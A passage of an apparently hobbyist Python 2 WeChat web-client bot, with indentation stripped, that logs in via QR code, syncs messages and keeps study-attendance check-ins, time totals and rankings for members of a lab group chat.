subprocess.call(["open", QRCODE_PATH])
else:
return
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
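    # Example of the synckey string built above (values are illustrative): with
    # SyncKey['List'] == [{'Key': 1, 'Val': 654321}, {'Key': 2, 'Val': 654322}],
    # self.synckey becomes "1_654321|2_654322", the pipe-joined form expected by
    # the synccheck query string.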
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
            if Contact['VerifyFlag'] & 8 != 0:  # official / service account
                ContactList.remove(Contact)
                self.PublicUsersList.append(Contact)
            elif Contact['UserName'] in SpecialUsers:  # special account
                ContactList.remove(Contact)
                self.SpecialUsersList.append(Contact)
            elif '@@' in Contact['UserName']:  # group chat
                ContactList.remove(Contact)
                self.GroupList.append(Contact)
            elif Contact['UserName'] == self.User['UserName']:  # myself
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
        # the response carries the full contact entry (including MemberList) for each requested group
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
        # the response carries the contact entry for the requested id
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'wx2.qq.com',
'webpush.wx2.qq.com',
'wx8.qq.com',
'webpush.wx8.qq.com',
'qq.com',
'webpush.wx.qq.com',
'web2.wechat.com',
'webpush.web2.wechat.com',
'wechat.com',
'webpush.web.wechat.com',
'webpush.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush.wx.qq.com',
'webpush2.wx.qq.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
if data == '':
return [-1,-1]
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
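    # Hedged summary of the synccheck reply, based on how listenMsgMode below
    # interprets it: the endpoint returns a JS snippet such as
    #     window.synccheck={retcode:"0",selector:"2"}
    # where retcode '0' means the session is alive ('1100'/'1101' mean you were
    # logged out elsewhere) and selector '2' signals that new messages should be
    # pulled with webwxsync.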
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
if self.DEBUG:
print json.dumps(dic, indent=4)
            logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
        # media counter
        self.media_count = self.media_count + 1
        # file name
        file_name = image_name
        # MIME type
        # mime_type = application/pdf, image/jpeg, image/png, etc.
        mime_type = mimetypes.guess_type(image_name, strict=False)[0]
        # media type as understood by WeChat; the server appears to accept only
        # 'pic' (shown inline as a picture) and 'doc' (shown as a file attachment)
        media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
        # last-modified date
        lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
        # file size
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
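    # Usage sketch (mirrors sendImg further below): upload first, then send the
    # returned MediaId to the target user; 'photo.jpg' is a placeholder path.
    #     response = self.webwxuploadmedia('photo.jpg')
    #     if response is not None:
    #         self.webwxsendmsgimg(user_id, response['MediaId'])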
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
    # Not working for now: web WeChat has not supported this API yet
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
            # not found among the known groups, so query the server by id
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
            return self.User['NickName']  # myself
if id[:2] == '@@':
            # group chat
name = self.getGroupName(id)
else:
            # special accounts
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # official / service accounts
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # direct contacts
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # group members
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
            content = msg['raw_msg']['Content'].replace(
                '&lt;', '<').replace('&gt;', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
                # location message
data = self._get(content)
if data == '':
return
                data = data.decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
temp = self._get(content)
if temp == '':
return
tree = html.fromstring(temp)
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
                # the file transfer helper account
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
                # message received from a group
if ":<br/>" in content:
[people, content] = content.split(':<br/>', 1)
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
                # message I sent to a group
groupName = dstName
srcName = self.getUserRemarkName(self.User['UserName'])
dstName = 'GROUP'
            # received a red packet
if content == '收到红包,请在手机上查看':
msg['message'] = content
            # the message content was set explicitly above
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
if groupName.strip() == "微信机器人测试" or groupName.strip() == "沉迷学习,日渐消瘦":
print msg['raw_msg']['Content']
if msg['raw_msg']['FromUserName'][:2] == '@@':
self.handleGroupMsg(content, msg['raw_msg']['FromUserName'], srcName)
elif msg['raw_msg']['ToUserName'][:2] == '@@':
self.handleGroupMsg(content, msg['raw_msg']['ToUserName'], srcName)
# print mat
# if mat == True and len(content_new) == 9:
# lines = srcName.strip() + '\t' + content_new[0:9] + '\r\n'
# print lines
# fd = open("test2","a")
# fd.write(lines)
# fd.close()
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleGroupMsg(self, content, dst, srcName):
log_info = ''
content_new = content.replace('<br/>', '\n')
buffer_content = content.split()
info = ''
# query keywords: query or q (for short).
if buffer_content[0] == "查询" or buffer_content[0].lower() == "query" or buffer_content[0].lower() == "q":
date_time = datetime.datetime.now()
name = ''
if len(buffer_content) == 1:
name = srcName.decode('UTF-8')
elif len(buffer_content) == 2 and buffer_content[1].isalpha():
name = buffer_content[1].decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' login'
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
log_info = ''
self.handleCheck(check_info, dst)
else:
info = '查无此人'
log_info = ''
        # Respond to the check-in ("签入"/"签到") and check-out ("签出") commands
# login keywords: login or in (for short).
elif content == "签入" or content == "签到" or content.lower() == "login" or content.lower() == "in":
date_time = datetime.datetime.now()
print repr(srcName)
print srcName
name = srcName.decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' login'
log_info = {'name' : name_dict[name], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
# logout keywords: logout or out (for short).
elif content == "签出" or content.lower() == "logout" or content.lower() == "out":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' logout'
log_info = {'name' : name_dict[name], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = "用户未注册"
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
# sum keywords: sum.
elif content == "统计" or content.lower() == "sum":
date_time = datetime.datetime.now()
name = ''
if len(buffer_content) == 1:
name = srcName.decode('UTF-8')
elif len(buffer_content) == 2 and buffer_content[1].isalpha():
name = buffer_content[1].decode('UTF-8')
if name_dict.has_key(name):
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.timeSum(check_info, dst)
# thisrank keywords: thisrank.
elif content == "今日排名" or content == "今日排行" or content.lower() == "thisrank":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.thisRank(check_info, dst)
# rank keywords: rank.
elif content == "排名" or content == "排行" or content.lower() == "rank":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.timeRank(check_info, dst)
elif content == "读取状态":
self.readStatus(dst)
elif content == "sudo清空重置":
date_time = datetime.datetime.now()
fn = 'data\data_' + date_time.strftime('%Y-%m-%d')
fd = open(fn,'w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
for i in range(memberNum):
state_in[i] = 0
last_login[i] = time_init
for j in range(7):
online_time[j][i] = datetime.timedelta(0)
fd = open('cache','w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
self.webwxsendmsg('重置成功',dst)
else:
try:
if len(buffer_content) == 2 and buffer_content[0].isdigit() and buffer_content[1].isalpha():
if len(buffer_content[0]) == 9:
time = buffer_content[0][0:8]
state = buffer_content[0][8]
usr = buffer_content[1]
date_time = datetime.datetime(datetime.date.today().year,
int(buffer_content[0][0:2]), int(buffer_content[0][2:4]),
int(buffer_content[0][4:6]), int(buffer_content[0][6:8]))
                        if state == '1':
if name_dict.has_key(usr):
if usr == 'gjq':
date_time = date_time + datetime.timedelta(0, 46800)
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' login'
log_info = {'name' : name_dict[usr], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' login'
log_info = {'name' : name_dict[usr], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
                        elif state == '0':
if name_dict.has_key(usr):
if usr == 'gjq':
date_time = date_time + datetime.timedelta(0, 46800)
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' logout'
log_info = {'name' : name_dict[usr], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' logout'
log_info = {'name' : name_dict[usr], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
else:
info = 'error'
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
else:
self.webwxsendmsg('时间格式错误【自动回复】', dst)
log_info = ''
except Exception, e:
self.webwxsendmsg(str(e) + '【自动回复】', dst)
log_info = ''
pass
try:
extra_info = ''
flag = False
            if log_info != '':
[extra_info, flag] = self.checkLogInfo(log_info)
if flag is True:
self.webwxsendmsg(info + '【自动回复】', dst)
self.webwxsendmsg(extra_info, dst)
else:
self.webwxsendmsg(extra_info, dst)
except Exception, e:
print str(e)
pass
print log_info
        if log_info != '':
if flag is True:
print 'ok'
fn = 'data\data_' + date_time.strftime('%Y-%m-%d') + '.json'
with open(fn, 'a') as f:
f.write(json.dumps(log_info) + '\n')
f.close()
fd = open('cache','w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
def readStatus(self, dst):
fd = open('cache','r')
num = 0
for lines in fd.readlines():
content_all = lines.split('\t')
state_in[num] = (int)(content_all[0])
last_login[num] = datetime.datetime.strptime(content_all[1], '%Y-%m-%d %H:%M:%S')
for i in range(7):
print(content_all[2+i])
print((str)(i))
temp_time = content_all[2+i][:-2]
online_time[i][num] = datetime.timedelta(0,(int)(temp_time))
num = num + 1
self.webwxsendmsg('读取成功',dst)
def checkLogInfo(self, log_info):
action = int(log_info['state']) #'0': logout, '1': login
name = log_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(log_info['time'], '%Y-%m-%d %H:%M')
info = ''
flag = False
        if state_in[id] == 0 and action == 0:
info = '【签出失败】您尚未登入'
return [info, flag]
        elif state_in[id] == 1 and action == 1:
info = '【签到失败】您尚未登出'
return [info, flag]
        elif state_in[id] == 0 and action == 1:
if last_login[id] > time:
info = '【签到失败】签入时间在签出时间之前'
            elif time - datetime.datetime.now() >= datetime.timedelta(0, 3600):  # check-in time is more than one hour ahead of now
info = '【签到失败】签入时间超出当前时间1小时'
else:
last_login[id] = time
state_in[id] = 1
weekday = time.weekday()
if online_time[weekday][id] == datetime.timedelta(0):
info = '鸣洲都能九点前到实验室,你有什么理由不努力!您刚开始沉迷学习,加油'
else:
info = '您今日沉迷学习时间为:' + str(online_time[weekday][id])
flag = True
return [info, flag]
        elif state_in[id] == 1 and action == 0:
if last_login[id] > time:
info = '【签出失败】签出时间在签入时间之前'
elif time - datetime.datetime.now() >= datetime.timedelta(0, 3600):
info = '【签出失败】签出时间超出当前时间1小时'
else:
state_in[id] = 0
duration = time - last_login[id]
weekday = time.weekday()
online_time[weekday][id] = online_time[weekday][id] + duration
#online_time_sum[id] = online_time_sum[id] + duration
info = '本次学习时间为:' + str(duration) + '\n今日沉迷学习时间为:' + str(online_time[weekday][id])
flag = True
return [info, flag]
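    # Worked example of the bookkeeping above (illustrative numbers): a member
    # checks in at 09:00 and checks out at 12:30 on the same day, so
    # duration == timedelta(hours=3, minutes=30) and that amount is added to
    # online_time[weekday][id]; a later check-in/check-out pair on the same
    # weekday simply accumulates on top of it.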
def handleCheck(self, check_info, dst):
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
duration = (time - last_login[id]) * state_in[id]
# if state_in[id] is 1:
# duration = time - last_login[id]
# else:
# duration = datetime.timedelta(0)
weekday = time.weekday()
online_time_curr = online_time[weekday][id] + duration
#rank = memberNum + 1
#for i in range(memberNum):
# if online_time_curr >= online_time[weekday][i] + (time - last_login[i]) * state_in[i]:
# rank = rank - 1
#msg = name + '今日在线总时间为:' + str(online_time_curr) + '\n排名第' + str(rank) + '位'
msg = name + '今日在线总时间为:' + str(online_time_curr)
self.webwxsendmsg(msg, dst)
def timeSum(self, check_info, dst):
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
duration = (time - last_login[id]) * state_in[id]
# if state_in[id] is 1:
# duration = time - last_login[id]
# else:
# duration = datetime.timedelta(0)
weekday = time.weekday()
sum_time = datetime.timedelta(0)
for i in range(weekday + 1):
sum_time = sum_time + online_time[i][id]
sum_time = sum_time + duration
msg = name + '本周在线总时间为:' + str(sum_time)
self.webwxsendmsg(msg, dst)
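    # Note on the '(time - last_login[i]) * state_in[i]' pattern used above and
    # in the ranking helpers below: state_in[i] is 0 or 1, and multiplying a
    # timedelta by it yields either timedelta(0) or the elapsed time since the
    # last check-in, so members who are currently checked in get credit for the
    # ongoing session without a separate branch.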
    # [func] ranking for the queried date
    # code reused from [func] timeRank
    # todo: 1. time zone issue of Jacky Gao
    #       2. start time modified as 06:00 am
def thisRank(self, check_info, dst):
online_this_sum = [datetime.timedelta(0) for i in range(memberNum)]
        thisseconds = [0 for i in range(memberNum)]  # seconds counted for today up to the queried time
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
for i in range(memberNum):
duration = (time - last_login[i]) * state_in[i]
weekday = time.weekday()
online_this_sum[i] = online_time[weekday][i] + duration
thisseconds[i] = online_this_sum[i].total_seconds()
name_list = ['徐凯源','宋绍铭','刘 洋','韩纪飞','高佳琦','郭东旭','张若冰','韩晓霏','于 超','林声远','鸡器人','厉丹阳','王佳林','韦 洁' ,'陈佳宁']
name_list_eng = ['xky','ssm','ly','hjf','gjq','gdx','zrb','hxf','yc','lsy','test','ldy','wjl','wj' ,'cjn']
lists = zip(thisseconds, online_this_sum, name_list, name_list_eng)
lists.sort(key=lambda x:x[0],reverse=True)
msg = '今日当前排名:\n'
rank = 0
for i in range(memberNum):
rkstr = ' %d' % (i+1) # rank string
if len(rkstr) < 4: # add two (half-width) space for alignment
rkstr = ' ' + rkstr
hrstr = '%2.1f' % (lists[i][0] / 3600.0) # hour string
if len(hrstr) < 4: # add four (half-width) space for alignment
hrstr = ' ' + hrstr
elif len(hrstr) < 5: # add two (half-width) space for alignment
hrstr = ' ' + hrstr
msg = msg + rkstr + ' | ' + lists[i][2] + ' ' + hrstr + ' 小时\n'
if lists[i][3] == name:
rank = i + 1
if rank != 0:
names = lists[rank - 1][2].replace(' ', '') # omit the full-width space '\xa1\xa1'
# splitline = '——————————\n' # split line (caution: display varies with PC and phone)
msg = msg + names + "的当前排名:" + (str)(rank)
self.webwxsendmsg(msg, dst)
def timeRank(self, check_info, dst):
online_time_sum = [datetime.timedelta(0) for i in range(memberNum)]
totalseconds = [0 for i in range(memberNum)]
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
for i in range(memberNum):
duration = (time - last_login[i]) * state_in[i]
weekday = time.weekday()
for j in range(weekday + 1):
online_time_sum[i] = online_time_sum[i] + online_time[j][i]
online_time_sum[i] = online_time_sum[i] + duration
totalseconds[i] = online_time_sum[i].total_seconds()
name_list = ['徐凯源','宋绍铭','刘 洋','韩纪飞','高佳琦','郭东旭','张若冰','韩晓霏','于 超','林声远','鸡器人','厉丹阳','王佳林','韦 洁' ,'陈佳宁']
name_list_eng = ['xky','ssm','ly','hjf','gjq','gdx','zrb','hxf','yc','lsy','test','ldy','wjl','wj' ,'cjn']
lists = zip(totalseconds, online_time_sum, name_list, name_list_eng)
lists.sort(key=lambda x:x[0],reverse=True)
msg = '本周目前排名:\n'
rank = 0
for i in range(memberNum):
rkstr = ' %d' % (i+1) # rank string
if len(rkstr) < 4: # add two (half-width) space for alignment
rkstr = ' ' + rkstr
hrstr = '%2.1f' % (lists[i][0] / 3600.0) # hour string
if len(hrstr) < 4: # add four (half-width) space for alignment
hrstr = ' ' + hrstr
elif len(hrstr) < 5: # add two (half-width) space for alignment
hrstr = ' ' + hrstr
msg = msg + rkstr + ' | ' + lists[i][2] + ' ' + hrstr + ' 小时\n'
if lists[i][3] == name:
rank = i + 1
if rank != 0:
names = lists[rank - 1][2].replace(' ', '') # omit the full-width space '\xa1\xa1'
# splitline = '——————————\n' # split line (caution: display varies with PC and phone)
msg = msg + names + "的目前排名:" + (str)(rank)
self.webwxsendmsg(msg, dst)
def handleMsg(self, r):
for msg in r['AddMsgList']:
